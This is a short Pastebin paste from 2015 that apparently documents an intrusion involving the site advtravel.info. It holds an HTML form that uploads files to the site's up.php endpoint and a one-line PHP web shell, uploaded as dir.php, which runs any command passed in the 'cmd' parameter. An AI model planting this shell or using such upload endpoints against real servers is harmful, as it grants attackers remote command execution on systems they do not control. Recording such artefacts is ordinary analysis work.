Advertisement
waliedassar

advtravel.info

Apr 8th, 2015
521
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.40 KB | None | 0 0
  1. HTML File Used to upload PHP files to the malicious website, advtravel.info
  2. <html>
  3. <body>
  4.  
  5. <form action="http://advtravel.info/tools/up.php" method="post" enctype="multipart/form-data">
  6. <input type="file" name="file" id="file"><br>
  7. <input type="submit" name="submit" value="Submit">
  8. </form>
  9.  
  10. </body>
  11. </html>
  12.  
  13. PHP file uploaded to advtravel.info as dir.php
  14. <?php
  15. echo shell_exec($_GET['cmd']);
  16. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement